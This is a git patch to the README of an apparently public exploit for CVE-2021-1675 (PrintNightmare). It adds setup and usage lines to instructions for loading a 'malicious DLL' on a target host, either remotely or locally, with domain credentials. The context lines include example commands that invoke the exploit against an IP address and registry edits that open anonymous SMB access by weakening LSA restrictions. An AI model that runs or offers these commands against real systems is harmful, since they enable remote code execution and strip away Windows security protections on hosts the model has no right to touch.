From 6c519f9c9ca0fd0c6fd35c1038adaae3ce4bf069 Mon Sep 17 00:00:00 2001 From: cube0x0 Date: Wed, 30 Jun 2021 12:10:05 +0200 Subject: [PATCH] updated readme Signed-off-by: cube0x0 --- README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/README.md b/README.md index e65e3a9..7912e74 100644 --- a/README.md +++ b/README.md @@ -13,6 +13,7 @@ Execute malicious DLL's remote or locally Before running the exploit you need to install my version of Impacket and after that you're gucci ``` +pip3 uninstall impacket git clone https://github.com/cube0x0/impacket cd impacket python3 ./setup.py install @@ -45,6 +46,7 @@ connection: Example; ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll' +./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll' ``` ### SMB configuration @@ -79,5 +81,6 @@ REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v Null REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f +# Reboot ```